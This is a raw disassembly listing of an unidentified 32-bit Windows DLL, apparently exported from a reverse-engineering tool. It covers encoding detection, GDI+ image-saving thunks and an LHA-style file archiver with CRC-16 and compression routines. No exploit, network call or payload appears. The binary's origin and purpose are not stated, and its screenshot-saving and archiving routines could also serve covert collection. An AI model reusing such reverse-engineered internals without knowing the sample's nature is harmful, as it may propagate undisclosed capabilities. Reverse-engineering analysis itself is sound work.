jz short loc_1001AC13
dec ecx
jz short loc_1001AC10
dec ecx
jz short loc_1001ABFB
dec ecx
jz short loc_1001ABE6
dec ecx
jnz short loc_1001AC15
inc eax
cmp eax, esi
jge short loc_1001ABE6
mov cl, [eax+edi]
and cl, 0C0h
cmp cl, 80h
jz short loc_1001ABE6
push 2
mov eax, esi
pop ebp
loc_1001ABE6: ; CODE XREF: sub_1001AB59+73�j
; sub_1001AB59+7B�j ...
inc eax
cmp eax, esi
jge short loc_1001ABFB
mov cl, [eax+edi]
and cl, 0C0h
cmp cl, 80h
jz short loc_1001ABFB
push 2
mov eax, esi
pop ebp
loc_1001ABFB: ; CODE XREF: sub_1001AB59+70�j
; sub_1001AB59+90�j ...
inc eax
cmp eax, esi
jge short loc_1001AC10
mov cl, [eax+edi]
and cl, 0C0h
cmp cl, 80h
jz short loc_1001AC10
push 2
mov eax, esi
pop ebp
loc_1001AC10: ; CODE XREF: sub_1001AB59+6D�j
; sub_1001AB59+A5�j ...
inc eax
jmp short loc_1001AC15
; ---------------------------------------------------------------------------
loc_1001AC13: ; CODE XREF: sub_1001AB59+6A�j
mov eax, esi
loc_1001AC15: ; CODE XREF: sub_1001AB59+76�j
; sub_1001AB59+B8�j
cmp eax, esi
jl short loc_1001ABB6
loc_1001AC19: ; CODE XREF: sub_1001AB59+5B�j
cmp [esp+0DCh+arg_8], bl
jnz short loc_1001AC29
loc_1001AC22: ; CODE XREF: sub_1001AB59+102�j
; sub_1001AB59+122�j ...
mov eax, ebp
jmp loc_1001AD1D
; ---------------------------------------------------------------------------
loc_1001AC29: ; CODE XREF: sub_1001AB59+C7�j
mov eax, 0C8h
cmp esi, eax
jl short loc_1001AC34
mov esi, eax
loc_1001AC34: ; CODE XREF: sub_1001AB59+D7�j
push esi ; Size
lea eax, [esp+0E0h+Dst]
push edi ; Src
push eax ; Dst
call memcpy ; memcpy
lea eax, [esp+0E8h+Dst]
push offset aEncoding ; "encoding"
push eax ; Str
mov [esp+esi+0F0h+Dst], bl
call ds:strstr ; strstr
mov esi, eax
add esp, 14h
cmp esi, ebx
jz short loc_1001AC22
push 9
add esi, 8
pop ebx
loc_1001AC63: ; CODE XREF: sub_1001AB59+11D�j
mov al, [esi]
cmp al, 0Ah
jz short loc_1001AC75
cmp al, 20h
jz short loc_1001AC75
cmp al, bl
jz short loc_1001AC75
cmp al, 0Dh
jnz short loc_1001AC78
loc_1001AC75: ; CODE XREF: sub_1001AB59+10E�j
; sub_1001AB59+112�j ...
inc esi
jmp short loc_1001AC63
; ---------------------------------------------------------------------------
loc_1001AC78: ; CODE XREF: sub_1001AB59+11A�j
cmp byte ptr [esi], 3Dh
jnz short loc_1001AC22
loc_1001AC7D: ; CODE XREF: sub_1001AB59+12A�j
; sub_1001AB59+12E�j ...
mov al, [esi+1]
inc esi
cmp al, 0Ah
jz short loc_1001AC7D
cmp al, 20h
jz short loc_1001AC7D
cmp al, bl
jz short loc_1001AC7D
cmp al, 0Dh
jz short loc_1001AC7D
cmp al, 27h
jz short loc_1001AC99
cmp al, 22h
jnz short loc_1001AC22
loc_1001AC99: ; CODE XREF: sub_1001AB59+13A�j
; sub_1001AB59+146�j ...
mov al, [esi+1]
inc esi
cmp al, 0Ah
jz short loc_1001AC99
cmp al, 20h
jz short loc_1001AC99
cmp al, bl
jz short loc_1001AC99
cmp al, 0Dh
jz short loc_1001AC99
mov edi, ds:_strnicmp
push 5 ; MaxCount
push offset aUtf8 ; "utf-8"
push esi ; Str1
call edi ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_1001AD15
push 4 ; MaxCount
push offset aUtf8_0 ; "utf8"
push esi ; Str1
call edi ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_1001AD15
push 8 ; MaxCount
push offset aShiftjis ; "shiftjis"
push esi ; Str1
call edi ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_1001AD0E
push ebx ; MaxCount
push offset aShiftJis_0 ; "shift-jis"
push esi ; Str1
call edi ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_1001AD0E
push 4 ; MaxCount
push offset aSjis ; "sjis"
push esi ; Str1
call edi ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_1001AD0E
push 2
jmp loc_1001ABA7
; ---------------------------------------------------------------------------
loc_1001AD0E: ; CODE XREF: sub_1001AB59+18B�j
; sub_1001AB59+19B�j ...
push 3
jmp loc_1001ABA7
; ---------------------------------------------------------------------------
loc_1001AD15: ; CODE XREF: sub_1001AB59+169�j
; sub_1001AB59+17A�j
xor eax, eax
cmp ebp, 2
setnz al
loc_1001AD1D: ; CODE XREF: sub_1001AB59+18�j
; sub_1001AB59+4F�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 0CCh
retn
sub_1001AB59 endp
; =============== S U B R O U T I N E =======================================
GdipGetImageEncodersSize_thunk proc near ; CODE XREF: j_GdipGetImageEncodersSize_thunk�j
push ecx
push edx
push offset GdipGetImageEncodersSize ; Arguments
jmp $+5
loc_1001AD34: ; CODE XREF: GdipGetImageEncoders_thunk+7�j
; GdipSaveImageToFile_thunk+7�j ...
push offset gdiplus_dll_import_table ; int
call sub_1001CBA7
pop edx
pop ecx
jmp eax
GdipGetImageEncodersSize_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipGetImageEncodersSize_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipGetImageEncoders_thunk proc near ; CODE XREF: j_GdipGetImageEncoders_thunk�j
push ecx
push edx
push offset GdipGetImageEncoders
jmp loc_1001AD34
GdipGetImageEncoders_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipGetImageEncoders_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipSaveImageToFile_thunk proc near ; CODE XREF: j_GdipSaveImageToFile_thunk�j
push ecx
push edx
push offset GdipSaveImageToFile
jmp loc_1001AD34
GdipSaveImageToFile_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipSaveImageToFile_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipDisposeImage_thunk proc near ; CODE XREF: j_GdipDisposeImage_thunk�j
push ecx
push edx
push offset GdipDisposeImage
jmp loc_1001AD34
GdipDisposeImage_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipDisposeImage_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipFree_thunk proc near ; CODE XREF: j_GdipFree_thunk�j
push ecx
push edx
push offset GdipFree
jmp loc_1001AD34
GdipFree_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipFree_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipCloneImage_thunk proc near ; CODE XREF: j_GdipCloneImage_thunk�j
push ecx
push edx
push offset GdipCloneImage
jmp loc_1001AD34
GdipCloneImage_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipCloneImage_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipAlloc_thunk proc near ; CODE XREF: j_GdipAlloc_thunk�j
push ecx
push edx
push offset GdipAlloc
jmp loc_1001AD34
GdipAlloc_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipAlloc_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipCreateBitmapFromHBITMAP_thunk proc near
; CODE XREF: j_GdipCreateBitmapFromHBITMAP_thunk�j
push ecx
push edx
push offset GdipCreateBitmapFromHBITMAP
jmp loc_1001AD34
GdipCreateBitmapFromHBITMAP_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipCreateBitmapFromHBITMAP_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdipCloneBitmapAreaI_thunk proc near ; CODE XREF: j_GdipCloneBitmapAreaI_thunk�j
push ecx
push edx
push offset GdipCloneBitmapAreaI
jmp loc_1001AD34
GdipCloneBitmapAreaI_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdipCloneBitmapAreaI_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdiplusStartup_thunk proc near ; CODE XREF: j_GdiplusStartup_thunk�j
push ecx
push edx
push offset GdiplusStartup
jmp loc_1001AD34
GdiplusStartup_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdiplusStartup_thunk. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
GdiplusShutdown_thunk proc near ; CODE XREF: j_GdiplusShutdown_thunk�j
push ecx
push edx
push offset GdiplusShutdown
jmp loc_1001AD34
GdiplusShutdown_thunk endp
; [00000006 BYTES: COLLAPSED FUNCTION j_GdiplusShutdown_thunk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001AE00(char *Filename, int)
sub_1001AE00 proc near ; CODE XREF: sub_1000B7EF+C90�p
; sub_1000B7EF+FAF�p
Filename = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+Filename]
push ebx
push edi
push offset aWb ; "wb"
push eax ; Filename
call ds:fopen ; fopen
add esp, 8
mov File, eax
call sub_1001B2C0
mov ebx, [esp+8+arg_4]
mov edi, [ebx]
test edi, edi
jbe short loc_1001AE5E
push esi
loc_1001AE2A: ; CODE XREF: sub_1001AE00+5B�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push eax
mov edx, ecx
mov esi, edi
mov edi, offset Filename
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_1001AE90
mov edi, [ebx+4]
add ebx, 4
add esp, 4
test edi, edi
ja short loc_1001AE2A
pop esi
loc_1001AE5E: ; CODE XREF: sub_1001AE00+27�j
mov eax, File
push eax ; File
push 0 ; Ch
call ds:fputc ; fputc
mov ecx, File
push ecx ; File
call ds:fclose ; fclose
add esp, 0Ch
xor eax, eax
pop edi
pop ebx
retn
sub_1001AE00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001AE90 proc near ; CODE XREF: sub_1001AE00+4B�p
arg_0 = dword ptr 4
push ebx
push offset Mode ; "rb"
push offset Filename ; Filename
call ds:fopen ; fopen
xor ebx, ebx
add esp, 8
cmp eax, ebx
mov dword_1007633C, eax
jnz short loc_1001AECF
mov eax, ds:_iob
push offset Filename
add eax, 40h
push offset aCanTOpenS ; "Can't open %s\n"
push eax ; File
call ds:fprintf ; fprintf
add esp, 0Ch
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_1001AECF: ; CODE XREF: sub_1001AE90+1D�j
mov eax, [esp+4+arg_0]
push offset Filename
cmp eax, ebx
jz short loc_1001AEF1
push offset aReplacingS ; "Replacing %s "
call ds:printf ; printf
add esp, 8
call sub_1001B1B0
jmp short loc_1001AEFF
; ---------------------------------------------------------------------------
loc_1001AEF1: ; CODE XREF: sub_1001AE90+4A�j
push offset aAddingS ; "Adding %s "
call ds:printf ; printf
add esp, 8
loc_1001AEFF: ; CODE XREF: sub_1001AE90+5F�j
mov ecx, File
push ebp
push esi
mov esi, ds:ftell
push edi
push ecx ; File
call esi ; ftell
mov ebp, eax
mov edi, offset Filename
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edx, dword_100240FC
mov al, byte_10024100
not ecx
dec ecx
mov dword_1007401C, edx
mov byte_1007402F, cl
add cl, 19h
mov byte ptr dword_10074120, cl
mov byte_10074020, al
call sub_1001B110
mov ecx, File
push ecx ; File
call esi ; ftell
add esp, 8
mov edi, eax
mov Offset, ebx
mov dword_10074014, ebx
mov dword_1007411C, ebx
mov dword_10076130, ebx
call sub_1001B640
mov eax, dword_1007411C
mov esi, ds:fseek
cmp eax, ebx
jz short loc_1001AFAC
mov edx, dword_1007633C
mov byte ptr dword_1007401C+3, 30h
push edx ; File
call ds:rewind ; rewind
mov eax, File
push ebx ; Origin
push edi ; Offset
push eax ; File
call esi ; fseek
add esp, 10h
call sub_1001B1D0
loc_1001AFAC: ; CODE XREF: sub_1001AE90+F4�j
mov edx, dword_1007633C
mov ecx, dword_10076130
push edx ; File
mov dword_10074124, ecx
call ds:fclose ; fclose
mov eax, Offset
push eax
push 4
push 5
call sub_1001B0E0
mov ecx, dword_10074014
push ecx
push 4
push 9
call sub_1001B0E0
mov ecx, dword_10074120
mov edx, dword_100240F4
mov ax, word_100240F8
and ecx, 0FFh
mov dword_10074029, edx
mov word_1007402D, ax
mov ax, word_100240F0
lea edx, (Offset+1)[ecx]
mov cl, byte_100240F2
push ebx ; Origin
mov [edx], ax
push ebp ; Offset
mov [edx+2], cl
mov edx, File
push edx ; File
call esi ; fseek
call sub_1001B110
mov eax, File
push 2 ; Origin
push ebx ; Offset
push eax ; File
call esi ; fseek
mov ecx, dword_10074014
mov edx, Offset
push ecx
push edx
call sub_1001B080
xor edx, edx
mov esi, 0Ah
mov ecx, eax
div esi
mov eax, 0CCCCCCCDh
push edx
mul ecx
shr edx, 3
push edx
push offset aD_D_0 ; " %d.%d%%\n"
call ds:printf ; printf
add esp, 48h
mov eax, 1
pop edi
pop esi
pop ebp
pop ebx
retn
sub_1001AE90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B080 proc near ; CODE XREF: sub_1001AE90+1B9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
push edi
mov edi, 3
loc_1001B08F: ; CODE XREF: sub_1001B080+2B�j
cmp ecx, 19999999h
ja short loc_1001B09E
lea ecx, [ecx+ecx*4]
shl ecx, 1
jmp short loc_1001B0AA
; ---------------------------------------------------------------------------
loc_1001B09E: ; CODE XREF: sub_1001B080+15�j
mov eax, 0CCCCCCCDh
mul esi
shr edx, 3
mov esi, edx
loc_1001B0AA: ; CODE XREF: sub_1001B080+1C�j
dec edi
jnz short loc_1001B08F
mov eax, esi
shr eax, 1
lea edx, [eax+ecx]
cmp edx, ecx
jnb short loc_1001B0BC
shr ecx, 1
mov esi, eax
loc_1001B0BC: ; CODE XREF: sub_1001B080+36�j
test esi, esi
jnz short loc_1001B0C5
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_1001B0C5: ; CODE XREF: sub_1001B080+3E�j
mov eax, esi
xor edx, edx
shr eax, 1
add eax, ecx
pop edi
div esi
pop esi
retn
sub_1001B080 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B0E0 proc near ; CODE XREF: sub_1001AE90+13F�p
; sub_1001AE90+14F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
dec ecx
js short locret_1001B101
mov eax, [esp+arg_0]
lea edx, [ecx+1]
mov ecx, [esp+arg_8]
lea eax, dword_1007401C[eax]
loc_1001B0F8: ; CODE XREF: sub_1001B0E0+1F�j
mov [eax], cl
inc eax
shr ecx, 8
dec edx
jnz short loc_1001B0F8
locret_1001B101: ; CODE XREF: sub_1001B0E0+5�j
retn
sub_1001B0E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B110 proc near ; CODE XREF: sub_1001AE90+B7�p
; sub_1001AE90+19B�p
mov ecx, dword_10074120
mov eax, File
push esi
mov esi, ds:fputc
and ecx, 0FFh
push eax ; File
push ecx ; Ch
call esi ; fputc
mov eax, dword_10074120
mov edx, dword_10074124
and eax, 0FFh
push edx
sub eax, 5
push 2
push eax
call sub_1001B0E0
mov ecx, File
add esp, 14h
push ecx ; File
call sub_1001B180
push eax ; Ch
call esi ; fputc
mov eax, dword_10074120
mov edx, File
and eax, 0FFh
push edx ; File
push eax ; Count
push offset dword_1007401C ; Str
call sub_1001B450
add esp, 14h
pop esi
retn
sub_1001B110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B180 proc near ; CODE XREF: sub_1001B110+42�p
mov edx, dword_10074120
push esi
xor esi, esi
xor ecx, ecx
and edx, 0FFh
jle short loc_1001B1A2
loc_1001B193: ; CODE XREF: sub_1001B180+20�j
xor eax, eax
mov al, byte ptr dword_1007401C[ecx]
add esi, eax
inc ecx
cmp ecx, edx
jl short loc_1001B193
loc_1001B1A2: ; CODE XREF: sub_1001B180+11�j
mov eax, esi
pop esi
and eax, 0FFh
retn
sub_1001B180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B1B0 proc near ; CODE XREF: sub_1001AE90+5A�p
mov eax, Offset
mov ecx, dword_10076348
push 1 ; Origin
push eax ; Offset
push ecx ; File
call ds:fseek ; fseek
add esp, 0Ch
retn
sub_1001B1B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B1D0 proc near ; CODE XREF: sub_1001AE90+117�p
mov eax, dword_1007633C
push esi
push edi
mov edi, ds:fread
push eax ; File
push 2000h ; Count
push 1 ; ElementSize
push offset dword_10074128 ; DstBuf
mov dword_10074014, 0
mov dword_10076130, 0
call edi ; fread
mov esi, eax
add esp, 10h
test esi, esi
jz short loc_1001B254
loc_1001B209: ; CODE XREF: sub_1001B1D0+75�j
mov ecx, File
push ecx ; File
push esi ; Count
push offset dword_10074128 ; Str
call sub_1001B450
mov edx, dword_10074014
add edx, esi
mov dword_10074014, edx
mov edx, dword_1007633C
push edx ; File
push 2000h ; Count
push 1 ; ElementSize
push offset dword_10074128 ; DstBuf
call edi ; fread
mov esi, eax
add esp, 1Ch
test esi, esi
jnz short loc_1001B209
mov eax, dword_10074014
pop edi
mov Offset, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_1001B254: ; CODE XREF: sub_1001B1D0+37�j
mov ecx, dword_10074014
pop edi
mov Offset, ecx
pop esi
retn
sub_1001B1D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; int __cdecl sub_1001B270(char *Format, char ArgList)
sub_1001B270 proc near ; CODE XREF: sub_1001B450+25�p
; sub_1001B770+71�p ...
Format = dword ptr 4
ArgList = byte ptr 8
mov eax, ds:_iob
push esi
mov esi, ds:putc
add eax, 40h
push eax ; File
push 0Ah ; Ch
call esi ; putc
mov eax, ds:_iob
mov edx, [esp+0Ch+Format]
lea ecx, [esp+0Ch+ArgList]
add eax, 40h
push ecx ; ArgList
push edx ; Format
push eax ; File
call ds:vfprintf ; vfprintf
mov ecx, ds:_iob
add ecx, 40h
push ecx ; File
push 0Ah ; Ch
call esi ; putc
add esp, 1Ch
push 1 ; Code
call ds:exit ; exit
sub_1001B270 endp
; ---------------------------------------------------------------------------
pop esi
nop
nop
nop
nop
nop
nop
nop
nop
nop
; =============== S U B R O U T I N E =======================================
sub_1001B2C0 proc near ; CODE XREF: sub_1001AE00+1A�p
push esi
xor edx, edx
mov ecx, offset word_10076134
loc_1001B2C8: ; CODE XREF: sub_1001B2C0+2A�j
mov eax, edx
mov esi, 8
loc_1001B2CF: ; CODE XREF: sub_1001B2C0+1B�j
test al, 1
jz short loc_1001B2D8
xor eax, 14002h
loc_1001B2D8: ; CODE XREF: sub_1001B2C0+11�j
shr eax, 1
dec esi
jnz short loc_1001B2CF
mov [ecx], ax
add ecx, 2
inc edx
cmp ecx, offset word_10076332
jle short loc_1001B2C8
pop esi
retn
sub_1001B2C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B2F0 proc near ; CODE XREF: sub_1001BF50+2C�p
; sub_1001BF50+7A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, dword_10076344
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_0]
cmp edi, ecx
jge short loc_1001B321
mov eax, [esp+0Ch+arg_4]
sub ecx, edi
shl eax, cl
mov dword_10076344, ecx
mov ecx, dword_10076338
pop edi
pop esi
pop ebx
or ecx, eax
mov dword_10076338, ecx
retn
; ---------------------------------------------------------------------------
loc_1001B321: ; CODE XREF: sub_1001B2F0+F�j
mov edx, Offset
mov eax, dword_10074014
mov esi, [esp+0Ch+arg_4]
mov ebx, ds:putc
cmp edx, eax
jnb short loc_1001B363
sub edi, ecx
mov eax, File
mov edx, esi
mov ecx, edi
shr edx, cl
mov ecx, dword_10076338
push eax ; File
or edx, ecx
push edx ; Ch
call ebx ; putc
mov eax, Offset
add esp, 8
inc eax
mov Offset, eax
jmp short loc_1001B36D
; ---------------------------------------------------------------------------
loc_1001B363: ; CODE XREF: sub_1001B2F0+48�j
mov dword_1007411C, 1
loc_1001B36D: ; CODE XREF: sub_1001B2F0+71�j
cmp edi, 8
jge short loc_1001B38B
mov ecx, 8
sub ecx, edi
pop edi
shl esi, cl
mov dword_10076344, ecx
mov dword_10076338, esi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_1001B38B: ; CODE XREF: sub_1001B2F0+80�j
mov eax, dword_10074014
mov ecx, Offset
cmp ecx, eax
jnb short loc_1001B3BB
mov ecx, File
mov edx, esi
push ecx ; File
lea ecx, [edi-8]
shr edx, cl
push edx ; Ch
call ebx ; putc
mov eax, Offset
add esp, 8
inc eax
mov Offset, eax
jmp short loc_1001B3C5
; ---------------------------------------------------------------------------
loc_1001B3BB: ; CODE XREF: sub_1001B2F0+A8�j
mov dword_1007411C, 1
loc_1001B3C5: ; CODE XREF: sub_1001B2F0+C9�j
mov ecx, 10h
sub ecx, edi
pop edi
shl esi, cl
mov dword_10076344, ecx
mov dword_10076338, esi
pop esi
pop ebx
retn
sub_1001B2F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001B3E0(void *DstBuf, size_t Count, FILE *File)
sub_1001B3E0 proc near ; CODE XREF: sub_1001B640+27�p
; sub_1001BBB0+4E�p
DstBuf = dword ptr 4
Count = dword ptr 8
File = dword ptr 0Ch
mov eax, [esp+File]
mov ecx, [esp+Count]
push esi
mov esi, [esp+4+DstBuf]
push edi
push eax ; File
push ecx ; Count
push 1 ; ElementSize
push esi ; DstBuf
call ds:fread ; fread
mov ecx, dword_10074014
mov edi, eax
add ecx, edi
add esp, 10h
mov dword_10074014, ecx
lea ecx, [edi-1]
test ecx, ecx
jl short loc_1001B44B
lea edx, [ecx+1]
mov ecx, dword_10076130
push ebx
loc_1001B41D: ; CODE XREF: sub_1001B3E0+63�j
mov eax, ecx
xor ebx, ebx
mov bl, [esi]
and eax, 0FFh
xor eax, ebx
xor ebx, ebx
shr ecx, 8
mov bx, word_10076134[eax*2]
mov eax, ebx
xor ecx, eax
inc esi
dec edx
mov dword_10076130, ecx
jnz short loc_1001B41D
mov eax, edi
pop ebx
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_1001B44B: ; CODE XREF: sub_1001B3E0+31�j
mov eax, edi
pop edi
pop esi
retn
sub_1001B3E0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001B450(void *Str, size_t Count, FILE *File)
sub_1001B450 proc near ; CODE XREF: sub_1001B110+61�p
; sub_1001B1D0+46�p
Str = dword ptr 4
Count = dword ptr 8
File = dword ptr 0Ch
mov eax, [esp+File]
push esi
mov esi, [esp+4+Str]
push edi
mov edi, [esp+8+Count]
push eax ; File
push edi ; Count
push 1 ; Size
push esi ; Str
call ds:fwrite ; fwrite
add esp, 10h
cmp eax, edi
jnb short loc_1001B47D
push offset aUnableToWrite ; "Unable to write"
call sub_1001B270
; ---------------------------------------------------------------------------
db 83h ; ƒ
db 0C4h ; Ä
db 4
; ---------------------------------------------------------------------------
loc_1001B47D: ; CODE XREF: sub_1001B450+1E�j
dec edi
js short loc_1001B4B2
mov eax, dword_10076130
push ebx
lea ecx, [edi+1]
loc_1001B489: ; CODE XREF: sub_1001B450+5F�j
mov edx, eax
xor ebx, ebx
mov bl, [esi]
and edx, 0FFh
xor edx, ebx
xor edi, edi
shr eax, 8
mov di, word_10076134[edx*2]
mov edx, edi
xor eax, edx
inc esi
dec ecx
mov dword_10076130, eax
jnz short loc_1001B489
pop ebx
loc_1001B4B2: ; CODE XREF: sub_1001B450+2E�j
pop edi
pop esi
retn
sub_1001B450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B4C0 proc near ; CODE XREF: sub_1001C420+9A�p
mov dword_10076344, 8
mov dword_10076338, 0
retn
sub_1001B4C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B4E0 proc near ; CODE XREF: sub_1001B890+206�p
arg_0 = dword ptr 4
mov ecx, dword_10076374
push ebx
push esi
mov esi, dword_10076360
movsx eax, si
push edi
mov edi, [esp+0Ch+arg_0]
mov dx, [ecx+eax*2]
mov ecx, dword_10076354
mov word ptr dword_10076360, dx
push edi
mov byte ptr [eax+ecx], 0
mov ebx, dword_10076364
movsx ecx, di
shl ecx, 1
mov dx, [ecx+ebx]
mov [ebx+eax*2], dx
mov ebx, dword_10076374
movsx edx, dx
mov [ebx+edx*2], si
mov ebx, dword_10076374
mov dx, [ecx+ebx]
mov [ebx+eax*2], dx
mov ebx, dword_10076364
movsx edx, dx
mov [ebx+edx*2], si
mov edx, dword_1007635C
mov cx, [ecx+edx]
mov [edx+eax*2], cx
mov ecx, dword_10076368
mov dl, byte ptr dword_10076350
mov [eax+ecx], dl
mov ecx, dword_1007634C
mov dx, word ptr dword_10076358+2
mov [ecx+eax*2], dx
mov eax, dword_1007636C
movsx edx, word ptr dword_10076358
add edx, eax
mov eax, dword_10076350
mov cl, [edx+eax]
push ecx
push esi
call sub_1001B5C0
mov ax, word ptr dword_10076358+2
mov ebx, dword_1007636C
mov ecx, dword_10076350
mov dx, ax
movsx eax, ax
add eax, ebx
push edx
mov dl, [eax+ecx]
push edx
push esi
call sub_1001B5C0
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_1001B4E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B5C0 proc near ; CODE XREF: sub_1001B4E0+AD�p
; sub_1001B4E0+D2�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = word ptr 0Ch
movzx ax, [esp+arg_4]
mov edx, [esp+arg_0]
add eax, 400h
shl eax, 4
add eax, edx
push ebx
movsx ecx, ax
push esi
mov esi, dword_10076374
push edi
mov di, [esp+0Ch+arg_8]
lea ecx, [esi+ecx*2]
mov si, [ecx]
mov [ecx], di
mov ebx, dword_10076374
movsx ecx, di
shl ecx, 1
mov [ecx+ebx], si
mov ebx, dword_10076364
movsx esi, si
mov [ebx+esi*2], di
mov esi, dword_10076364
pop edi
mov [ecx+esi], ax
mov eax, dword_1007635C
pop esi
pop ebx
mov [ecx+eax], dx
movsx ecx, dx
mov edx, dword_10076354
lea eax, [ecx+edx]
mov cl, [ecx+edx]
inc cl
mov [eax], cl
retn
sub_1001B5C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B640 proc near ; CODE XREF: sub_1001AE90+E2�p
call sub_1001B770
call sub_1001B7F0
call sub_1001C420
mov eax, dword_1007633C
mov ecx, dword_1007636C
push eax ; File
add ecx, 2000h
push 2100h ; Count
push ecx ; DstBuf
call sub_1001B3E0
mov edx, ds:_iob
mov dword_10076370, eax
add edx, 40h
push edx ; File
push 2Eh ; Ch
call ds:putc ; putc
add esp, 14h
mov dword_10076350, 0
mov word ptr dword_10076358+2, 2000h
call sub_1001B890
mov eax, dword_10076370
mov ecx, dword_10076350
cmp ecx, eax
jle short loc_1001B6B2
mov dword_10076350, eax
loc_1001B6B2: ; CODE XREF: sub_1001B640+6B�j
push esi
push edi
test eax, eax
jle loc_1001B767
loc_1001B6BC: ; CODE XREF: sub_1001B640+121�j
mov eax, dword_1007411C
test eax, eax
jnz loc_1001B767
mov esi, dword_10076350
mov edi, dword_10076358
call sub_1001BBB0
mov eax, dword_10076350
mov ecx, dword_10076370
cmp eax, ecx
jle short loc_1001B6F0
mov eax, ecx
mov dword_10076350, eax
loc_1001B6F0: ; CODE XREF: sub_1001B640+A7�j
cmp eax, esi
jg short loc_1001B73C
cmp esi, 3
jl short loc_1001B73C
mov ax, word ptr dword_10076358+2
lea ecx, [esi+0FDh]
sub eax, edi
sub eax, 2
and eax, 1FFFh
push eax
push ecx
call sub_1001BE50
add esp, 8
dec esi
test esi, esi
jle short loc_1001B726
loc_1001B71E: ; CODE XREF: sub_1001B640+E4�j
call sub_1001BBB0
dec esi
jnz short loc_1001B71E
loc_1001B726: ; CODE XREF: sub_1001B640+DC�j
mov eax, dword_10076370
mov ecx, dword_10076350
cmp ecx, eax
jle short loc_1001B75F
mov dword_10076350, eax
jmp short loc_1001B75F
; ---------------------------------------------------------------------------
loc_1001B73C: ; CODE XREF: sub_1001B640+B2�j
; sub_1001B640+B7�j
movsx edx, word ptr dword_10076358+2
mov ecx, dword_1007636C
xor eax, eax
push 0
mov al, [edx+ecx-1]
push eax
call sub_1001BE50
mov eax, dword_10076370
add esp, 8
loc_1001B75F: ; CODE XREF: sub_1001B640+F3�j
; sub_1001B640+FA�j
test eax, eax
jg loc_1001B6BC
loc_1001B767: ; CODE XREF: sub_1001B640+76�j
; sub_1001B640+83�j
call sub_1001C4D0
pop edi
pop esi
retn
sub_1001B640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001B770 proc near ; CODE XREF: sub_1001B640�p
